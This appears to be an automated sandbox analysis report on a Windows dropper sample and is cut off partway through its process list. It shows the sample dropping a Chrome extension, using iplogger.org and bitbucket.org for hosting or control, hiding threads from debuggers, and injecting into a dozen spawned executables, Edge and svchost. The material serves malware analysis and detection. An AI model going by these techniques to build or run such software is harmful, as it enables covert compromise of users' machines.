Drops Chrome extension

Description Indicator Process Target
File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\fiogdnnnljjlfjgkifccooilblmjflkm\5.18.6_0\manifest.json C:\Users\Admin\AppData\Local\Temp\asj.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A bitbucket.org N/A N/A
N/A bitbucket.org N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Suspicious use of NtCreateThreadExHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX2\per.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2280 set thread context of 5780 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX1\quv.exe C:\Users\Admin\AppData\Local\Temp\RarSFX1\quv.exe

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\piz.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\cld.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\xcopy.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\file_clu.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\RarSFX1\quv.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\ubisoftant.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\update_b1f99b.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\RarSFX1\quv.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\RwJ2xhfygvdE.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\regsvr32.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\md3_3kvm.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\asj.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\secd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\update_b1f99b.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\update_b1f99b.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\update_b1f99b.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier C:\Windows\SysWOW64\xcopy.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX1\quv.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\ubisoftant.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\ubisoftant.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\md3_3kvm.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\ubisoftant.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ubisoftant.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3076 wrote to memory of 4216 N/A C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe C:\Users\Admin\AppData\Local\Temp\file_clu.exe
PID 3076 wrote to memory of 4216 N/A C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe C:\Users\Admin\AppData\Local\Temp\file_clu.exe
PID 3076 wrote to memory of 4216 N/A C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe C:\Users\Admin\AppData\Local\Temp\file_clu.exe
PID 3076 wrote to memory of 1348 N/A C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe C:\Users\Admin\AppData\Local\Temp\md3_3kvm.exe
PID 3076 wrote to memory of 1348 N/A C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe C:\Users\Admin\AppData\Local\Temp\md3_3kvm.exe
PID 3076 wrote to memory of 1348 N/A C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe C:\Users\Admin\AppData\Local\Temp\md3_3kvm.exe
PID 3076 wrote to memory of 3404 N/A C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe C:\Users\Admin\AppData\Local\Temp\asj.exe
PID 3076 wrote to memory of 3404 N/A C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe C:\Users\Admin\AppData\Local\Temp\asj.exe
PID 3076 wrote to memory of 3404 N/A C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe C:\Users\Admin\AppData\Local\Temp\asj.exe
PID 3076 wrote to memory of 1992 N/A C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe C:\Users\Admin\AppData\Local\Temp\secd.exe
PID 3076 wrote to memory of 1992 N/A C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe C:\Users\Admin\AppData\Local\Temp\secd.exe
PID 3076 wrote to memory of 1992 N/A C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe C:\Users\Admin\AppData\Local\Temp\secd.exe
PID 3076 wrote to memory of 4596 N/A C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe C:\Users\Admin\AppData\Local\Temp\cld.exe
PID 3076 wrote to memory of 4596 N/A C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe C:\Users\Admin\AppData\Local\Temp\cld.exe
PID 3076 wrote to memory of 4596 N/A C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe C:\Users\Admin\AppData\Local\Temp\cld.exe
PID 3076 wrote to memory of 1760 N/A C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe C:\Users\Admin\AppData\Local\Temp\ubisoftant.exe
PID 3076 wrote to memory of 1760 N/A C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe C:\Users\Admin\AppData\Local\Temp\ubisoftant.exe
PID 3076 wrote to memory of 1760 N/A C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe C:\Users\Admin\AppData\Local\Temp\ubisoftant.exe
PID 3076 wrote to memory of 3504 N/A C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe C:\Users\Admin\AppData\Local\Temp\piz.exe
PID 3076 wrote to memory of 3504 N/A C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe C:\Users\Admin\AppData\Local\Temp\piz.exe
PID 3076 wrote to memory of 3504 N/A C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe C:\Users\Admin\AppData\Local\Temp\piz.exe
PID 3076 wrote to memory of 4068 N/A C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe C:\Users\Admin\AppData\Local\Temp\update_b1f99b.exe
PID 3076 wrote to memory of 4068 N/A C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe C:\Users\Admin\AppData\Local\Temp\update_b1f99b.exe
PID 3076 wrote to memory of 4068 N/A C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe C:\Users\Admin\AppData\Local\Temp\update_b1f99b.exe
PID 4216 wrote to memory of 3436 N/A C:\Users\Admin\AppData\Local\Temp\file_clu.exe C:\Windows\SysWOW64\cmd.exe
PID 4216 wrote to memory of 3436 N/A C:\Users\Admin\AppData\Local\Temp\file_clu.exe C:\Windows\SysWOW64\cmd.exe
PID 4216 wrote to memory of 3436 N/A C:\Users\Admin\AppData\Local\Temp\file_clu.exe C:\Windows\SysWOW64\cmd.exe
PID 3076 wrote to memory of 1808 N/A C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe C:\Users\Admin\AppData\Local\Temp\setup.exe
PID 3076 wrote to memory of 1808 N/A C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe C:\Users\Admin\AppData\Local\Temp\setup.exe
PID 3076 wrote to memory of 1808 N/A C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe C:\Users\Admin\AppData\Local\Temp\setup.exe
PID 1992 wrote to memory of 2280 N/A C:\Users\Admin\AppData\Local\Temp\secd.exe C:\Users\Admin\AppData\Local\Temp\RarSFX1\quv.exe
PID 1992 wrote to memory of 2280 N/A C:\Users\Admin\AppData\Local\Temp\secd.exe C:\Users\Admin\AppData\Local\Temp\RarSFX1\quv.exe
PID 1992 wrote to memory of 2280 N/A C:\Users\Admin\AppData\Local\Temp\secd.exe C:\Users\Admin\AppData\Local\Temp\RarSFX1\quv.exe
PID 3504 wrote to memory of 2712 N/A C:\Users\Admin\AppData\Local\Temp\piz.exe C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
PID 3504 wrote to memory of 2712 N/A C:\Users\Admin\AppData\Local\Temp\piz.exe C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
PID 3504 wrote to memory of 2712 N/A C:\Users\Admin\AppData\Local\Temp\piz.exe C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
PID 4596 wrote to memory of 3484 N/A C:\Users\Admin\AppData\Local\Temp\cld.exe C:\Users\Admin\AppData\Local\Temp\RarSFX2\per.exe
PID 4596 wrote to memory of 3484 N/A C:\Users\Admin\AppData\Local\Temp\cld.exe C:\Users\Admin\AppData\Local\Temp\RarSFX2\per.exe
PID 3076 wrote to memory of 1180 N/A C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3076 wrote to memory of 1180 N/A C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1180 wrote to memory of 2896 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1180 wrote to memory of 2896 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3436 wrote to memory of 3628 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\RwJ2xhfygvdE.exe
PID 3436 wrote to memory of 3628 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\RwJ2xhfygvdE.exe
PID 3436 wrote to memory of 3628 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\RwJ2xhfygvdE.exe
PID 3628 wrote to memory of 3768 N/A C:\Users\Admin\AppData\Local\Temp\RwJ2xhfygvdE.exe C:\Windows\system32\svchost.exe
PID 3628 wrote to memory of 3768 N/A C:\Users\Admin\AppData\Local\Temp\RwJ2xhfygvdE.exe C:\Windows\system32\svchost.exe
PID 3628 wrote to memory of 3768 N/A C:\Users\Admin\AppData\Local\Temp\RwJ2xhfygvdE.exe C:\Windows\system32\svchost.exe
PID 3436 wrote to memory of 1044 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 3436 wrote to memory of 1044 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 3436 wrote to memory of 1044 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 3404 wrote to memory of 4848 N/A C:\Users\Admin\AppData\Local\Temp\asj.exe C:\Windows\SysWOW64\cmd.exe
PID 3404 wrote to memory of 4848 N/A C:\Users\Admin\AppData\Local\Temp\asj.exe C:\Windows\SysWOW64\cmd.exe
PID 3404 wrote to memory of 4848 N/A C:\Users\Admin\AppData\Local\Temp\asj.exe C:\Windows\SysWOW64\cmd.exe
PID 1180 wrote to memory of 4764 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1180 wrote to memory of 4764 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1180 wrote to memory of 4764 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1180 wrote to memory of 4764 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1180 wrote to memory of 4764 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1180 wrote to memory of 4764 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1180 wrote to memory of 4764 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1180 wrote to memory of 4764 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1180 wrote to memory of 4764 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1180 wrote to memory of 4764 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Processes

C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe

"C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe"

C:\Users\Admin\AppData\Local\Temp\file_clu.exe

"C:\Users\Admin\AppData\Local\Temp\file_clu.exe"

C:\Users\Admin\AppData\Local\Temp\md3_3kvm.exe

"C:\Users\Admin\AppData\Local\Temp\md3_3kvm.exe"

C:\Users\Admin\AppData\Local\Temp\asj.exe

